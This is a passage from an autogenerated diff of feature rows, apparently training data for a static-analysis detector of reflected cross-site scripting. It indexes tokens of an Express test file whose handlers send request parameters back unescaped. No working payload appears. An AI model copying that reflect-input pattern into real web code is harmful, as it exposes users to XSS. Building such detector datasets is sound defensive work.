autogenerated/Xss/ReflectedXss/tst2.js:14:15:14:17 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:14:15:14:17 | req | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:14:15:14:24 | req.params | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:14:15:14:24 | req.params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:14:15:14:24 | req.params | enclosingFunctionBody | req res p req params p aKnownValue res send p res send p p aKnownValue res send p res send p | +| autogenerated/Xss/ReflectedXss/tst2.js:14:15:14:24 | req.params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:14:15:14:24 | req.params | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:14:19:14:24 | params | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:14:19:14:24 | params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:14:19:14:24 | params | enclosingFunctionBody | req res p req params p aKnownValue res send p res send p p aKnownValue res send p res send p | +| autogenerated/Xss/ReflectedXss/tst2.js:14:19:14:24 | params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:14:19:14:24 | params | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:16:7:16:7 | p | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:16:7:16:7 | p | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:16:7:16:7 | p | enclosingFunctionBody | req res p req params p aKnownValue res send p res send p p aKnownValue res send p res send p | +| autogenerated/Xss/ReflectedXss/tst2.js:16:7:16:7 | p | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:16:7:16:7 | p | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:16:7:16:22 | p == aKnownValue | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:16:7:16:22 | p == aKnownValue | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:16:7:16:22 | p == aKnownValue | enclosingFunctionBody | req res p req params p aKnownValue res send p res send p p aKnownValue res send p res send p | +| autogenerated/Xss/ReflectedXss/tst2.js:16:7:16:22 | p == aKnownValue | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:16:7:16:22 | p == aKnownValue | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:16:12:16:22 | aKnownValue | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:16:12:16:22 | aKnownValue | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:16:12:16:22 | aKnownValue | enclosingFunctionBody | req res p req params p aKnownValue res send p res send p p aKnownValue res send p res send p | +| autogenerated/Xss/ReflectedXss/tst2.js:16:12:16:22 | aKnownValue | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:16:12:16:22 | aKnownValue | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:17:5:17:7 | res | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:17:5:17:7 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:17:5:17:7 | res | enclosingFunctionBody | req res p req params p aKnownValue res send p res send p p aKnownValue res send p res send p | +| autogenerated/Xss/ReflectedXss/tst2.js:17:5:17:7 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:17:5:17:7 | res | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:17:5:17:12 | res.send | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:17:5:17:12 | res.send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:17:5:17:12 | res.send | enclosingFunctionBody | req res p req params p aKnownValue res send p res send p p aKnownValue res send p res send p | +| autogenerated/Xss/ReflectedXss/tst2.js:17:5:17:12 | res.send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:17:5:17:12 | res.send | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:17:5:17:15 | exceptional return of res.send(p) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:17:5:17:15 | exceptional return of res.send(p) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:17:5:17:15 | exceptional return of res.send(p) | enclosingFunctionBody | req res p req params p aKnownValue res send p res send p p aKnownValue res send p res send p | +| autogenerated/Xss/ReflectedXss/tst2.js:17:5:17:15 | exceptional return of res.send(p) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:17:5:17:15 | exceptional return of res.send(p) | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:17:5:17:15 | res.send(p) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:17:5:17:15 | res.send(p) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:17:5:17:15 | res.send(p) | enclosingFunctionBody | req res p req params p aKnownValue res send p res send p p aKnownValue res send p res send p | +| autogenerated/Xss/ReflectedXss/tst2.js:17:5:17:15 | res.send(p) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:17:5:17:15 | res.send(p) | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:17:9:17:12 | send | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:17:9:17:12 | send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:17:9:17:12 | send | enclosingFunctionBody | req res p req params p aKnownValue res send p res send p p aKnownValue res send p res send p | +| autogenerated/Xss/ReflectedXss/tst2.js:17:9:17:12 | send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:17:9:17:12 | send | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | | autogenerated/Xss/ReflectedXss/tst2.js:17:14:17:14 | p | CalleeFlexibleAccessPath | res.send | | autogenerated/Xss/ReflectedXss/tst2.js:17:14:17:14 | p | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/tst2.js:17:14:17:14 | p | contextFunctionInterfaces | | @@ -21940,6 +146211,31 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/tst2.js:17:14:17:14 | p | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/tst2.js:17:14:17:14 | p | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | | autogenerated/Xss/ReflectedXss/tst2.js:17:14:17:14 | p | receiverName | res | +| autogenerated/Xss/ReflectedXss/tst2.js:18:3:18:5 | res | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:18:3:18:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:18:3:18:5 | res | enclosingFunctionBody | req res p req params p aKnownValue res send p res send p p aKnownValue res send p res send p | +| autogenerated/Xss/ReflectedXss/tst2.js:18:3:18:5 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:18:3:18:5 | res | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:18:3:18:10 | res.send | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:18:3:18:10 | res.send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:18:3:18:10 | res.send | enclosingFunctionBody | req res p req params p aKnownValue res send p res send p p aKnownValue res send p res send p | +| autogenerated/Xss/ReflectedXss/tst2.js:18:3:18:10 | res.send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:18:3:18:10 | res.send | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:18:3:18:13 | exceptional return of res.send(p) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:18:3:18:13 | exceptional return of res.send(p) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:18:3:18:13 | exceptional return of res.send(p) | enclosingFunctionBody | req res p req params p aKnownValue res send p res send p p aKnownValue res send p res send p | +| autogenerated/Xss/ReflectedXss/tst2.js:18:3:18:13 | exceptional return of res.send(p) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:18:3:18:13 | exceptional return of res.send(p) | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:18:3:18:13 | res.send(p) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:18:3:18:13 | res.send(p) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:18:3:18:13 | res.send(p) | enclosingFunctionBody | req res p req params p aKnownValue res send p res send p p aKnownValue res send p res send p | +| autogenerated/Xss/ReflectedXss/tst2.js:18:3:18:13 | res.send(p) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:18:3:18:13 | res.send(p) | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:18:7:18:10 | send | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:18:7:18:10 | send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:18:7:18:10 | send | enclosingFunctionBody | req res p req params p aKnownValue res send p res send p p aKnownValue res send p res send p | +| autogenerated/Xss/ReflectedXss/tst2.js:18:7:18:10 | send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:18:7:18:10 | send | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | | autogenerated/Xss/ReflectedXss/tst2.js:18:12:18:12 | p | CalleeFlexibleAccessPath | res.send | | autogenerated/Xss/ReflectedXss/tst2.js:18:12:18:12 | p | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/tst2.js:18:12:18:12 | p | contextFunctionInterfaces | | @@ -21948,6 +146244,46 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/tst2.js:18:12:18:12 | p | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/tst2.js:18:12:18:12 | p | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | | autogenerated/Xss/ReflectedXss/tst2.js:18:12:18:12 | p | receiverName | res | +| autogenerated/Xss/ReflectedXss/tst2.js:20:7:20:7 | p | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:20:7:20:7 | p | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:20:7:20:7 | p | enclosingFunctionBody | req res p req params p aKnownValue res send p res send p p aKnownValue res send p res send p | +| autogenerated/Xss/ReflectedXss/tst2.js:20:7:20:7 | p | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:20:7:20:7 | p | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:20:7:20:22 | p != aKnownValue | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:20:7:20:22 | p != aKnownValue | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:20:7:20:22 | p != aKnownValue | enclosingFunctionBody | req res p req params p aKnownValue res send p res send p p aKnownValue res send p res send p | +| autogenerated/Xss/ReflectedXss/tst2.js:20:7:20:22 | p != aKnownValue | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:20:7:20:22 | p != aKnownValue | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:20:12:20:22 | aKnownValue | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:20:12:20:22 | aKnownValue | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:20:12:20:22 | aKnownValue | enclosingFunctionBody | req res p req params p aKnownValue res send p res send p p aKnownValue res send p res send p | +| autogenerated/Xss/ReflectedXss/tst2.js:20:12:20:22 | aKnownValue | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:20:12:20:22 | aKnownValue | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:21:5:21:7 | res | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:21:5:21:7 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:21:5:21:7 | res | enclosingFunctionBody | req res p req params p aKnownValue res send p res send p p aKnownValue res send p res send p | +| autogenerated/Xss/ReflectedXss/tst2.js:21:5:21:7 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:21:5:21:7 | res | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:21:5:21:12 | res.send | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:21:5:21:12 | res.send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:21:5:21:12 | res.send | enclosingFunctionBody | req res p req params p aKnownValue res send p res send p p aKnownValue res send p res send p | +| autogenerated/Xss/ReflectedXss/tst2.js:21:5:21:12 | res.send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:21:5:21:12 | res.send | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:21:5:21:15 | exceptional return of res.send(p) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:21:5:21:15 | exceptional return of res.send(p) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:21:5:21:15 | exceptional return of res.send(p) | enclosingFunctionBody | req res p req params p aKnownValue res send p res send p p aKnownValue res send p res send p | +| autogenerated/Xss/ReflectedXss/tst2.js:21:5:21:15 | exceptional return of res.send(p) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:21:5:21:15 | exceptional return of res.send(p) | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:21:5:21:15 | res.send(p) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:21:5:21:15 | res.send(p) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:21:5:21:15 | res.send(p) | enclosingFunctionBody | req res p req params p aKnownValue res send p res send p p aKnownValue res send p res send p | +| autogenerated/Xss/ReflectedXss/tst2.js:21:5:21:15 | res.send(p) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:21:5:21:15 | res.send(p) | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:21:9:21:12 | send | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:21:9:21:12 | send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:21:9:21:12 | send | enclosingFunctionBody | req res p req params p aKnownValue res send p res send p p aKnownValue res send p res send p | +| autogenerated/Xss/ReflectedXss/tst2.js:21:9:21:12 | send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:21:9:21:12 | send | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | | autogenerated/Xss/ReflectedXss/tst2.js:21:14:21:14 | p | CalleeFlexibleAccessPath | res.send | | autogenerated/Xss/ReflectedXss/tst2.js:21:14:21:14 | p | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/tst2.js:21:14:21:14 | p | contextFunctionInterfaces | | @@ -21956,6 +146292,31 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/tst2.js:21:14:21:14 | p | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/tst2.js:21:14:21:14 | p | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | | autogenerated/Xss/ReflectedXss/tst2.js:21:14:21:14 | p | receiverName | res | +| autogenerated/Xss/ReflectedXss/tst2.js:23:5:23:7 | res | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:23:5:23:7 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:23:5:23:7 | res | enclosingFunctionBody | req res p req params p aKnownValue res send p res send p p aKnownValue res send p res send p | +| autogenerated/Xss/ReflectedXss/tst2.js:23:5:23:7 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:23:5:23:7 | res | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:23:5:23:12 | res.send | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:23:5:23:12 | res.send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:23:5:23:12 | res.send | enclosingFunctionBody | req res p req params p aKnownValue res send p res send p p aKnownValue res send p res send p | +| autogenerated/Xss/ReflectedXss/tst2.js:23:5:23:12 | res.send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:23:5:23:12 | res.send | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:23:5:23:15 | exceptional return of res.send(p) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:23:5:23:15 | exceptional return of res.send(p) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:23:5:23:15 | exceptional return of res.send(p) | enclosingFunctionBody | req res p req params p aKnownValue res send p res send p p aKnownValue res send p res send p | +| autogenerated/Xss/ReflectedXss/tst2.js:23:5:23:15 | exceptional return of res.send(p) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:23:5:23:15 | exceptional return of res.send(p) | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:23:5:23:15 | res.send(p) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:23:5:23:15 | res.send(p) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:23:5:23:15 | res.send(p) | enclosingFunctionBody | req res p req params p aKnownValue res send p res send p p aKnownValue res send p res send p | +| autogenerated/Xss/ReflectedXss/tst2.js:23:5:23:15 | res.send(p) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:23:5:23:15 | res.send(p) | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:23:9:23:12 | send | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:23:9:23:12 | send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:23:9:23:12 | send | enclosingFunctionBody | req res p req params p aKnownValue res send p res send p p aKnownValue res send p res send p | +| autogenerated/Xss/ReflectedXss/tst2.js:23:9:23:12 | send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:23:9:23:12 | send | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | | autogenerated/Xss/ReflectedXss/tst2.js:23:14:23:14 | p | CalleeFlexibleAccessPath | res.send | | autogenerated/Xss/ReflectedXss/tst2.js:23:14:23:14 | p | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/tst2.js:23:14:23:14 | p | contextFunctionInterfaces | | @@ -21964,12 +146325,46 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/tst2.js:23:14:23:14 | p | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/tst2.js:23:14:23:14 | p | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | | autogenerated/Xss/ReflectedXss/tst2.js:23:14:23:14 | p | receiverName | res | +| autogenerated/Xss/ReflectedXss/tst2.js:27:7:27:11 | clone | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:27:7:27:11 | clone | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:27:7:27:11 | clone | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:27:7:27:11 | clone | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:27:7:27:30 | clone | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:27:7:27:30 | clone | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:27:7:27:30 | clone | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:27:7:27:30 | clone = ... clone') | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:27:7:27:30 | clone = ... clone') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:27:7:27:30 | clone = ... clone') | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:27:15:27:21 | require | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:27:15:27:21 | require | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:27:15:27:21 | require | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:27:15:27:30 | exceptional return of require('clone') | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:27:15:27:30 | exceptional return of require('clone') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:27:15:27:30 | exceptional return of require('clone') | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:27:15:27:30 | require('clone') | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:27:15:27:30 | require('clone') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:27:15:27:30 | require('clone') | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | | autogenerated/Xss/ReflectedXss/tst2.js:27:23:27:29 | 'clone' | CalleeFlexibleAccessPath | require | | autogenerated/Xss/ReflectedXss/tst2.js:27:23:27:29 | 'clone' | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/tst2.js:27:23:27:29 | 'clone' | calleeImports | | | autogenerated/Xss/ReflectedXss/tst2.js:27:23:27:29 | 'clone' | contextFunctionInterfaces | | | autogenerated/Xss/ReflectedXss/tst2.js:27:23:27:29 | 'clone' | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/tst2.js:27:23:27:29 | 'clone' | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:29:1:29:3 | app | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:29:1:29:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:29:1:29:3 | app | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:29:1:29:7 | app.get | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:29:1:29:7 | app.get | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:29:1:29:7 | app.get | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:29:1:38:2 | app.get ... T OK\\n}) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:29:1:38:2 | app.get ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:29:1:38:2 | app.get ... T OK\\n}) | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:29:1:38:2 | exceptional return of app.get ... T OK\\n}) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:29:1:38:2 | exceptional return of app.get ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:29:1:38:2 | exceptional return of app.get ... T OK\\n}) | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:29:5:29:7 | get | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:29:5:29:7 | get | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:29:5:29:7 | get | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | | autogenerated/Xss/ReflectedXss/tst2.js:29:9:29:14 | '/baz' | CalleeFlexibleAccessPath | app.get | | autogenerated/Xss/ReflectedXss/tst2.js:29:9:29:14 | '/baz' | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/tst2.js:29:9:29:14 | '/baz' | calleeImports | express | @@ -21977,6 +146372,26 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/tst2.js:29:9:29:14 | '/baz' | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/tst2.js:29:9:29:14 | '/baz' | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | | autogenerated/Xss/ReflectedXss/tst2.js:29:9:29:14 | '/baz' | receiverName | app | +| autogenerated/Xss/ReflectedXss/tst2.js:29:17:29:16 | clone | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:29:17:29:16 | clone | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:29:17:29:16 | clone | enclosingFunctionBody | req res p req params obj obj p p other clone obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:29:17:29:16 | clone | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:29:17:29:16 | clone | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:29:17:29:16 | this | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:29:17:29:16 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:29:17:29:16 | this | enclosingFunctionBody | req res p req params obj obj p p other clone obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:29:17:29:16 | this | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:29:17:29:16 | this | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:29:17:38:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:29:17:38:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:29:17:38:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res p req params obj obj p p other clone obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:29:17:38:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:29:17:38:1 | 'arguments' object of anonymous function | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:29:17:38:1 | exceptional return of anonymous function | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:29:17:38:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:29:17:38:1 | exceptional return of anonymous function | enclosingFunctionBody | req res p req params obj obj p p other clone obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:29:17:38:1 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:29:17:38:1 | exceptional return of anonymous function | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | | autogenerated/Xss/ReflectedXss/tst2.js:29:17:38:1 | functio ... OT OK\\n} | CalleeFlexibleAccessPath | app.get | | autogenerated/Xss/ReflectedXss/tst2.js:29:17:38:1 | functio ... OT OK\\n} | InputArgumentIndex | 1 | | autogenerated/Xss/ReflectedXss/tst2.js:29:17:38:1 | functio ... OT OK\\n} | calleeImports | express | @@ -21984,6 +146399,157 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/tst2.js:29:17:38:1 | functio ... OT 